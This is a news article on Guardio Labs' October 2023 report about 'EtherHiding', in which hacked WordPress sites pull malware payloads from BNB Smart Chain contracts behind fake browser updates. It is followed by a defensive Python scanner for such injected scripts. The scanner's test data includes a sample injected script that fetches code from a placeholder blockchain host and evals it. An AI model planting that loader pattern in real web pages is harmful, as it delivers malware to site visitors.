Hackers Exploit BNB Smart Chain Contracts to Spread Malware, Guardio Labs Warns
Summary:
Hackers are leveraging BNB Smart Chain (BSC) smart contracts to spread malware, as reported by Guardio Labs. The technique, known as 'EtherHiding', involves compromising WordPress websites to fetch payloads from blockchain contracts. The attackers use Binance smart contracts as anonymous platforms for hosting payloads. They adapt their attack methods, recently utilizing fake browser updates to distribute malware. Once the malicious contracts are deployed, they operate autonomously. Guardio highlights the need for adaptive defenses to counter these emerging cyber threats.
In a novel approach to spreading malicious software, hackers have found a way to abuse BNB Smart Chain (BSC) smart contracts. Guardio Labs, in their report dated October 15, revealed that these cybercriminals employ 'EtherHiding', a method that involves infecting WordPress websites by injecting code that fetches parts of the payload from blockchain contracts. Binance smart contracts are manipulated by these hackers to act as secure, anonymous platforms for hosting their payloads.
Hackers can alter the code and switch their modes of attack at will. Recent attacks have taken the form of fraudulent browser updates: victims are tricked into clicking a fake update button on a bogus landing page, which then runs payload-laden JavaScript that fetches additional code from the attacker's domain. This sequence of events ultimately leads to the entire site being plastered with misleading browser update notifications that deliver malware.
One of the key challenges with this method is its adaptability; threat actors can simply interchange the malicious code with each new blockchain transaction. Hence, mitigating such threats is arduous, according to Nati Tal, head of cybersecurity at Guardio Labs, and his colleague, security researcher Oleg Zaytsev.
Upon deployment, the corrupted smart contracts run independently, and all Binance can hope for is for the developer community to identify and report any malicious code within contracts.
Guardio has warned website owners, particularly those using WordPress - which powers about 43% of all websites - to tighten their security measures as WordPress sites are often compromised and act as an entry point for threats, allowing them to reach a wide array of potential victims.
Finally, the firm noted that the advent of Web3 and blockchain has opened up new avenues for malicious campaigns to operate undetected, necessitating the development of adaptive defenses to tackle such emerging threats.
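For site owners acting on this warning, the pattern described above (a page script that reads from a blockchain contract and then runs what it receives) can be checked for heuristically in served HTML. The Python scanner below is an added example, not code from Guardio Labs or this article; the indicator patterns, the sample pages, the placeholder hosts and the `readContract` helper name are assumptions constructed for illustration.

```python
import re

# Indicator patterns are assumptions chosen for this example, not Guardio's signatures.
CHAIN_ACCESS = re.compile(r"eth_call|JsonRpcProvider|new\s+Web3\s*\(|bsc-dataseed", re.I)
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\batob\s*\(", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)


def _hits(pattern, text):
    """Distinct matches, lower-cased with whitespace removed, in sorted order."""
    return sorted({re.sub(r"\s+", "", m.group(0)).lower() for m in pattern.finditer(text)})


def scan_html(html):
    """Flag every <script> element that references blockchain RPC access.

    A script that also runs code assembled at run time is rated "high"; chain
    access alone is rated "review", since legitimate Web3 widgets do that too.
    """
    findings = []
    for index, match in enumerate(SCRIPT_BLOCK.finditer(html)):
        attrs, body = match.group(1), match.group(2)
        chain = _hits(CHAIN_ACCESS, attrs + " " + body)
        if not chain:
            continue
        dynamic = _hits(DYNAMIC_EXEC, body)
        findings.append({"script_index": index, "chain_indicators": chain,
                         "exec_indicators": dynamic,
                         "severity": "high" if dynamic else "review"})
    return findings


# Constructed sample pages; hosts, addresses and helper names are placeholders.
CLEAN_PAGE = ('<script src="/wp-includes/js/jquery/jquery.min.js"></script>'
              '<script>document.title = "Blog";</script>')
WIDGET_PAGE = ('<script>var rpc = new ethers.providers.JsonRpcProvider('
               '"https://rpc.example.invalid");</script>')
INJECTED_PAGE = ('<script src="/wp-includes/js/jquery/jquery.min.js"></script>'
                 '<script>readContract("https://bsc-dataseed.example.invalid", '
                 '"eth_call", "0xPLACEHOLDER").then(function (r) { eval(r); });</script>')

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("widget", WIDGET_PAGE),
                       ("injected", INJECTED_PAGE)]:
        print(name, scan_html(page))
```

Because the code held in the contract can be swapped with each new transaction, the check keys on the loader's behaviour in the page rather than on any payload content.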
Published At
10/16/2023 5:09:00 AM